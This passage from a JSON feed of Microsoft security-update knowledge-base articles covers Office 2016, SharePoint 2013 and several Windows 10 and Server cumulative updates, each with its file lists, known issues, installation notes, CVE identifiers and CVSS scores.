msointl.dll| 16.0.4927.1000| 1827376| 14-Sep-22| 01:52 \nmsointl.dll.x86.1055| msointl.dll| 16.0.4927.1000| 1998680| 14-Sep-22| 01:52 \nmsointl.dll.x86.1058| msointl.dll| 16.0.4927.1000| 1891896| 14-Sep-22| 01:52 \nmsointl.dll.x86.1066| msointl.dll| 16.0.4927.1000| 2005552| 14-Sep-22| 01:52 \nmsointl.dll.x86.2052| msointl.dll| 16.0.4927.1000| 2321704| 14-Sep-22| 01:52 \nmsointl.dll.x86.1028| msointl.dll| 16.0.4927.1000| 2329384| 14-Sep-22| 01:52 \nconversion.office.msores.dll| msores.dll| 16.0.4795.1000| 81683088| 13-Sep-22| 05:47 \nmsores.dll| msores.dll| 16.0.4795.1000| 81683088| 13-Sep-22| 05:47 \nppt.conversion.msores.dll| msores.dll| 16.0.4795.1000| 81683088| | \nppt.edit.msores.dll| msores.dll| 16.0.4795.1000| 81683088| | \nwac.office.msores.dll| msores.dll| 16.0.4795.1000| 81683088| | \nmsores.dll| msores.dll| 16.0.4795.1000| 81683304| 13-Sep-22| 05:47 \nmsores.dll.x86| msores.dll| 16.0.4795.1000| 81683304| 13-Sep-22| 05:57 \nmso.dll.x64| mso.dll| 16.0.5365.1000| 19883944| 15-Sep-22| 04:51 \nmso.dll.x86| mso.dll| 16.0.5365.1000| 14426040| 15-Sep-22| 04:53 \nmsointl.dll.x64.1033| msointl.dll| 16.0.4927.1000| 1564424| 13-Sep-22| 05:48 \nmsointl.dll.x86.1033| msointl.dll| 16.0.4927.1000| 1539640| 13-Sep-22| 05:54 \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2016: October 11, 2022 (KB5002288)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-11T07:00:00", "id": "KB5002288", "href": "https://support.microsoft.com/en-us/help/5002288", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-10T10:46:45", "description": "None\nCumulative update packages for Microsoft SharePoint Enterprise Server 2013 contain hotfixes for the issues that were fixed since the release of SharePoint Enterprise Server 2013.\n\n**Note: **This is build **15.0.5493.1000** of the cumulative update package.\n\nWe recommend that you test those hotfixes before you deploy them in a production environment. Because the builds are cumulative, each new release contains all the hotfixes and security updates that were included with the previous Microsoft SharePoint Enterprise Server 2013 update package releases.**Important notes about the cumulative update package**\n\n * The Microsoft Office 2013 hotfixes are now multilingual. This cumulative update package contains updates for all languages.\n * This cumulative update package includes all the server component packages. Additionally, this cumulative update package updates only those components that are installed on the system.\n\n## Improvements and fixes in this cumulative update\n\nThis cumulative update package fixes the issues that are described in the following Microsoft Knowledge Base (KB) articles:\n\n * October 11, 2022, update for SharePoint Enterprise Server 2013 (KB5002260)\n * October 11, 2022, update for SharePoint Enterprise Server 2013 (KB4486686)\n * Description of the security update for SharePoint Foundation 2013: October 11, 2022 (KB5002284)\n\n## How to download and install the update\n\nThis update is available only for manual download and installation from the Microsoft Download Center.\n\n * [Download cumulative update 5002283 for SharePoint Enterprise Server 2013](<https://www.microsoft.com/download/details.aspx?familyid=9f070ed7-4b99-4412-82e1-1af8c8bacbb8>)\n\n**Note: **Three files are available in this update: one .exe file and two .cab files. In order for the installation to work correctly, you must download all three files.\n\n**Virus-scan claim**Microsoft scanned this file for viruses by using the most current virus-detection software that was available on the date that the file was posted. The file is stored on security-enhanced servers that help prevent any unauthorized changes to it.\n\n## Cumulative update package information\n\n### Hotfixes that are included in this cumulative update package\n\nThis cumulative update package contains all the .msp files that we released as hotfixes or as public updates that target SharePoint Server 2013. This update package also targets SharePoint Foundation 2013. Therefore, you don't have to install those packages separately.\n\n### Prerequisites\n\nTo apply this cumulative update, you must have [Microsoft SharePoint Server 2013 Service Pack 1 (SP1)](<https://support.microsoft.com/help/2880552>) installed.\n\n### Restart requirement\n\nYou may have to restart the computer after you apply this cumulative update.\n\n## File information\n\nFor the list of files that are included in the cumulative update 5002283, download the [file information](<https://download.microsoft.com/download/d/3/d/d3de7925-70bb-4fc8-b2be-c4a9e2ce7921/5002283.csv>).\n\n## References\n\nSee the information about the standard [terminology](<https://support.microsoft.com/help/824684/description-of-the-standard-terminology-that-is-used-to-describe-micro>) that's used to describe Microsoft software updates.The [Office System TechCenter](<https://docs.microsoft.com/office/admins-itprofessionals>) contains the latest administrative updates and strategic deployment resources for all versions of Office.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "October 11, 2022, cumulative update for SharePoint Enterprise Server 2013 (KB5002283)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-41038"], "modified": "2022-10-11T07:00:00", "id": "KB5002283", "href": "https://support.microsoft.com/en-us/help/5002283", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T10:48:54", "description": "None\n**NEW 8/26/22****IMPORTANT **Microsoft released [KB5012170](<http://support.microsoft.com/help/5012170>) on August 9, 2022. It provides support for Secure Boot Forbidden Signature Database (DBX). This is a standalone, security update. Windows 8.1 and newer clients and Windows Server 2012 and newer servers must install this update regardless of whether BitLocker is enabled or supported on your device. After you install the update, you might receive error \u201c0x800f0922\u201d; see [Update might fail to install and you might receive a 0x800f0922 error](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#2883msgdesc>). After you install the update, your device might start up in [BitLocker recovery mode](<https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn383583\\(v=ws.11\\)>). See [Some devices might start up into BitLocker Recovery](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#some-devices-might-start-up-into-bitlocker-recovery>) and [Finding your BitLocker recovery key in Windows](<https://support.microsoft.com/windows/finding-your-bitlocker-recovery-key-in-windows-6b71ad27-0b89-ea08-f143-056f5ab347d6>).\n\n**7/12/22** \nAfter September 20, 2022, there will no longer be optional, non-security releases (known as \"C\" or preview releases) for the 2019 LTSC editions and Windows Server 2019. Only cumulative monthly security updates (known as the \"B\" or Update Tuesday release) will continue for the 2019 LTSC editions and Windows Server 2019. \n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 1809, see its update history page. \n\n## Highlights \n\n * Addresses security issues for your Windows operating system. \n\n## Improvements\n\nThis security update includes improvements that were a part of update KB5015880 (released July 21, 2022) and also addresses the following issues:\n\n * Addresses an issue that might cause the Local Security Authority Server Service (LSASS) to leak tokens. This issue affects devices that have installed Windows updates dated June 14, 2022 or later. This issue occurs when the device performs a specific form of service for user (S4U) in a non-Trusted Computing Base (TCB) Windows service that runs as Network Service.\nIf you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.For more information about security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [August 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>).\n\n### Windows 10 servicing stack update - 17763.3232\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. \n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| This issue is addressed by updates released June 11, 2019 and later. We recommend you install the latest security updates for your device. Customers installing Windows Server 2019 using media should install the latest [Servicing Stack Update (SSU)](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) before installing the language pack or other optional components. If using the [Volume Licensing Service Center (VLSC)](<https://www.microsoft.com/licensing/servicecenter/default.aspx>), acquire the latest Windows Server 2019 media available. The proper order of installation is as follows:\n\n 1. Install the latest prerequisite SSU, currently [KB5005112](<https://support.microsoft.com/help/5005112>)\n 2. Install optional components or language packs\n 3. Install latest cumulative update\n**Note** Updating your device will prevent this issue, but will have no effect on devices already affected by this issue. If this issue is present in your device, you will need to use the workaround steps to repair it.**Workaround:**\n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/windows/manage-the-input-and-display-language-settings-in-windows-12a10cb4-8626-9b77-0ccb-5013e0c7c7a2>).\n 2. Click **Check for Updates **and install the April 2019 Cumulative Update or later. For instructions, see [Update Windows 10](<https://support.microsoft.com/windows/update-windows-3c5ae7fc-9fb6-9af1-1984-b5e0412c556a>).\n**Note **If reinstalling the language pack does not mitigate the issue, use the In-Place-Upgrade feature. For guidance, see [How to do an in-place upgrade on Windows](<https://docs.microsoft.com/troubleshoot/windows-server/deployment/repair-or-in-place-upgrade>), and [Perform an in-place upgrade of Windows Server](<https://docs.microsoft.com/windows-server/get-started/perform-in-place-upgrade>). \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nStarting at 12:00 A.M. Saturday, September 10, 2022, the official time in Chile will advance 60 minutes in accordance with the August 9, 2022 official announcement by the Chilean government about a daylight saving time (DST) time zone change. This moves the DST change which was previously September 4 to September 10.Symptoms if the workaround is not used on devices between September 4, 2022 and September 11, 2022:\n\n * \u200bTime shown in Windows and apps will not be correct.\n * \u200bApps and cloud services which use date and time for integral functions, such as Microsoft Teams and Microsoft Outlook, notifications and scheduling of meetings might be 60 minutes off.\n * \u200bAutomation that uses date and time, such as Scheduled tasks, might not run at the expected time.\n * \u200bTimestamp on transactions, files, and logs will be 60 minutes off.\n * \u200bOperations that rely on time-dependent protocols such as Kerberos might cause authentication failures when attempting to logon or access resources.\n * \u200bWindows devices and apps outside of Chile might also be affected if they are connecting to servers or devices in Chile or if they are scheduling or attending meetings taking place in Chile from another location or time zone. Windows devices outside of Chile should not use the workaround, as it would change their local time on the device.\n| This issue is addressed in KB5017379. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).Prerequisite:You **must **install the August 10, 2021 SSU (KB5005112) before installing the LCU. **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5016623>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5016623](<https://download.microsoft.com/download/8/a/8/8a85b65e-7837-4878-a25b-b094c3442c82/5016623.csv>).For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 17763.3232](<https://download.microsoft.com/download/f/5/1/f51753ae-66cd-4568-8fb6-5a5cbf79186c/SSU_version_17763_3232.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "August 9, 2022\u2014KB5016623 (OS Build 17763.3287)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2022-10-11T07:00:00", "id": "KB5016623", "href": "https://support.microsoft.com/en-us/help/5016623", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T10:48:54", "description": "None\n**NEW 8/26/22****IMPORTANT **Microsoft released [KB5012170](<http://support.microsoft.com/help/5012170>) on August 9, 2022. It provides support for Secure Boot Forbidden Signature Database (DBX). This is a standalone, security update. Windows 8.1 and newer clients and Windows Server 2012 and newer servers must install this update regardless of whether BitLocker is enabled or supported on your device. After you install the update, you might receive error \u201c0x800f0922\u201d; see [Update might fail to install and you might receive a 0x800f0922 error](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#2883msgdesc>). After you install the update, your device might start up in [BitLocker recovery mode](<https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn383583\\(v=ws.11\\)>). See [Some devices might start up into BitLocker Recovery](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#some-devices-might-start-up-into-bitlocker-recovery>) and [Finding your BitLocker recovery key in Windows](<https://support.microsoft.com/windows/finding-your-bitlocker-recovery-key-in-windows-6b71ad27-0b89-ea08-f143-056f5ab347d6>).\n\nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows Server 2022, see its update history page. **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the Windows release health dashboard. \n\n## Improvements\n\nThis security update includes improvements that were a part of update KB5015879 (released July 19, 2022) and also addresses the following issues: \n\n * Addresses an issue that might cause the Local Security Authority Server Service (LSASS) to leak tokens. This issue affects devices that have installed Windows updates dated June 14, 2022 or later. This issue occurs when the device performs a specific form of service for user (S4U) in a non-Trusted Computing Base (TCB) Windows service that runs as Network Service.\nIf you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.For more information about security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>) and the [August 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>)\n\n### Windows 10 servicing stack update - 20348.850\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, IE mode tabs in Microsoft Edge might stop responding when a site displays a modal dialog box. A modal dialog box is a form or dialog box that requires the user to respond before continuing or interacting with other portions of the webpage or app. **Developer Note** Sites affected by this issue call **window.focus**.| This issue is addressed in KB5016693. \nStarting at 12:00 A.M. Saturday, September 10, 2022, the official time in Chile will advance 60 minutes in accordance with the August 9, 2022 official announcement by the Chilean government about a daylight saving time (DST) time zone change. This moves the DST change which was previously September 4 to September 10.Symptoms if the workaround is not used on devices between September 4, 2022 and September 11, 2022:\n\n * \u200bTime shown in Windows and apps will not be correct.\n * \u200bApps and cloud services which use date and time for integral functions, such as Microsoft Teams and Microsoft Outlook, notifications and scheduling of meetings might be 60 minutes off.\n * \u200bAutomation that uses date and time, such as Scheduled tasks, might not run at the expected time.\n * \u200bTimestamp on transactions, files, and logs will be 60 minutes off.\n * \u200bOperations that rely on time-dependent protocols such as Kerberos might cause authentication failures when attempting to logon or access resources.\n * \u200bWindows devices and apps outside of Chile might also be affected if they are connecting to servers or devices in Chile or if they are scheduling or attending meetings taking place in Chile from another location or time zone. Windows devices outside of Chile should not use the workaround, as it would change their local time on the device.\n| This issue is addressed in KB5017381. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5016627>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Microsoft Server operating system-21H2**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File Information**For a list of the files that are provided in this update, download the [file information for cumulative update 5016627](<https://download.microsoft.com/download/c/9/0/c903a6e1-fbe7-4978-8482-9d4c9cd3b5cc/5016627.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 20348.850](<https://download.microsoft.com/download/9/9/1/9916b98e-3f4e-42ff-8be5-1647dbbe0037/SSU_version_20348_850.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "August 9, 2022\u2014KB5016627 (OS Build 20348.887)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2022-10-11T07:00:00", "id": "KB5016627", "href": "https://support.microsoft.com/en-us/help/5016627", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T10:48:55", "description": "None\n**NEW 8/26/22****IMPORTANT **Microsoft released [KB5012170](<http://support.microsoft.com/help/5012170>) on August 9, 2022. It provides support for Secure Boot Forbidden Signature Database (DBX). This is a standalone, security update. Windows 8.1 and newer clients and Windows Server 2012 and newer servers must install this update regardless of whether BitLocker is enabled or supported on your device. After you install the update, you might receive error \u201c0x800f0922\u201d; see [Update might fail to install and you might receive a 0x800f0922 error](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#2883msgdesc>). After you install the update, your device might start up in [BitLocker recovery mode](<https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn383583\\(v=ws.11\\)>). See [Some devices might start up into BitLocker Recovery](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#some-devices-might-start-up-into-bitlocker-recovery>) and [Finding your BitLocker recovery key in Windows](<https://support.microsoft.com/windows/finding-your-bitlocker-recovery-key-in-windows-6b71ad27-0b89-ea08-f143-056f5ab347d6>).\n\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 1507, see its update history page. \n\n## Highlights\n\n * Addresses an issue that prevents certain troubleshooting tools rom opening.\n * Addresses security issues for your Windows operating system. \n\n## Improvements \n\nThis security update includes quality improvements. Key changes include: \n\n * Addresses an issue that prevents certain troubleshooting tools from opening.\nIf you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.For more information about security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [August 2022 Security Updates.](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>).\n\n## Known issues in this update\n\n**Symptoms**| **Workaround** \n---|--- \nStarting at 12:00 A.M. Saturday, September 10, 2022, the official time in Chile will advance 60 minutes in accordance with the August 9, 2022 official announcement by the Chilean government about a daylight saving time (DST) time zone change. This moves the DST change which was previously September 4 to September 10.Symptoms if the workaround is not used on devices between September 4, 2022 and September 11, 2022:\n\n * \u200bTime shown in Windows and apps will not be correct.\n * \u200bApps and cloud services which use date and time for integral functions, such as Microsoft Teams and Microsoft Outlook, notifications and scheduling of meetings might be 60 minutes off.\n * \u200bAutomation that uses date and time, such as Scheduled tasks, might not run at the expected time.\n * \u200bTimestamp on transactions, files, and logs will be 60 minutes off.\n * \u200bOperations that rely on time-dependent protocols such as Kerberos might cause authentication failures when attempting to logon or access resources.\n * \u200bWindows devices and apps outside of Chile might also be affected if they are connecting to servers or devices in Chile or if they are scheduling or attending meetings taking place in Chile from another location or time zone. Windows devices outside of Chile should not use the workaround, as it would change their local time on the device.\n| To mitigate this issue, please see [Possible issues caused by new Daylight Savings Time in Chile](<https://docs.microsoft.com/windows/release-health/status-windows-10-1507#2892msgdesc>).We are working on a resolution and will provide an update in an upcoming release.**Note **We plan to release an update to support this change; however, there might be insufficient time to properly build, test, and release such an update before the change goes into effect. Please use the workaround above. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>). If you are using Windows Update, the latest SSU (KB5014024) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5016639>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5016639](<https://download.microsoft.com/download/b/3/2/b3207cff-8f47-4014-a438-0126cd8adc99/5016639.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "August 9, 2022\u2014KB5016639 (OS Build 10240.19387)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2022-10-11T07:00:00", "id": "KB5016639", "href": "https://support.microsoft.com/en-us/help/5016639", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T10:48:54", "description": "None\n**NEW 8/26/22****IMPORTANT **Microsoft released [KB5012170](<http://support.microsoft.com/help/5012170>) on August 9, 2022. It provides support for Secure Boot Forbidden Signature Database (DBX). This is a standalone, security update. Windows 8.1 and newer clients and Windows Server 2012 and newer servers must install this update regardless of whether BitLocker is enabled or supported on your device. After you install the update, you might receive error \u201c0x800f0922\u201d; see [Update might fail to install and you might receive a 0x800f0922 error](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#2883msgdesc>). After you install the update, your device might start up in [BitLocker recovery mode](<https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn383583\\(v=ws.11\\)>). See [Some devices might start up into BitLocker Recovery](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#some-devices-might-start-up-into-bitlocker-recovery>) and [Finding your BitLocker recovery key in Windows](<https://support.microsoft.com/windows/finding-your-bitlocker-recovery-key-in-windows-6b71ad27-0b89-ea08-f143-056f5ab347d6>).\n\n**UPDATED 8/9/22** \n**IMPORTANT **Windows Server, version 20H2 is at end of service today, August 9, 2022. After August 9, 2022, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows Server. We will continue to service the following editions: Windows 10 Enterprise and Education, Windows 10 IoT Enterprise, Windows 10 Enterprise multi-session, and Windows 10 on Surface Hub. \n\n**5/10/22** \n**REMINDER **To update to one of the newer versions of Windows 10, we recommend that you use the appropriate Enablement Package KB (EKB). Using the EKB makes updating faster and easier and requires a single restart. To find the EKB for a specific OS, go to the **Improvements** section and click or tap the OS name to expand the collapsible section. \n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 20H2, see its update history page. **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the Windows release health dashboard.\n\n## Highlights\n\n * Addresses an issue that affects the printing of files you submit to a printer.\n * Addresses a known issue that might prevent the Input Indicator and Language Bar from displaying in the notification area. This issue affects devices that have more than one language installed.\n * Addresses a known issue that might cause printing operations to fail. It might also create printer duplicates on a device. The duplicate printer\u2019s name usually has the suffix \"Copy1\". Applications that refer to the printer by a specific name cannot print.\n\n## Improvements \n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10, version 21H2\n\n**Important: **Use EKB KB5003791 to update to Windows 10, version 21H2.\n\nThis security update includes quality improvements. Key changes include: \n\n * This build includes all the improvements from Windows 10, version 20H2.\n * No additional issues were documented for this release. \n\n### \n\n__\n\nWindows 10, version 21H1\n\n**Important: **Use EKB KB5000736 to update to Windows 10, version 21H1.\n\nThis security update includes quality improvements. Key changes include: \n\n * This build includes all the improvements from Windows 10, version 20H2.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows Server, version 20H2\n\n**Important: **Use EKB KB4562830 to update to Windows Server, version 20H2.\n\nThis security update includes improvements that were a part of update KB5015878 (released July 26, 2022) and also addresses the following issues: \n\n * Addresses an issue that might cause the Local Security Authority Server Service (LSASS) to leak tokens. This issue affects devices that have installed Windows updates dated June 14, 2022 or later. This issue occurs when the device performs a specific form of service for user (S4U) in a non-Trusted Computing Base (TCB) Windows service that runs as Network Service.\n * Addresses an issue that creates a duplicate print queue. This causes the original print queue to lose functionality.\n * Addresses a known issue that might prevent the Input Indicator and Language Bar from displaying in the notification area. This issue affects devices that have more than one language installed.\n * Addresses a known issue that might cause printing operations to fail. It might also create printer duplicates on a device. The duplicate printer\u2019s name usually has the suffix \"Copy1\". Applications that refer to the printer by a specific name cannot print.\nIf you installed earlier updates, only 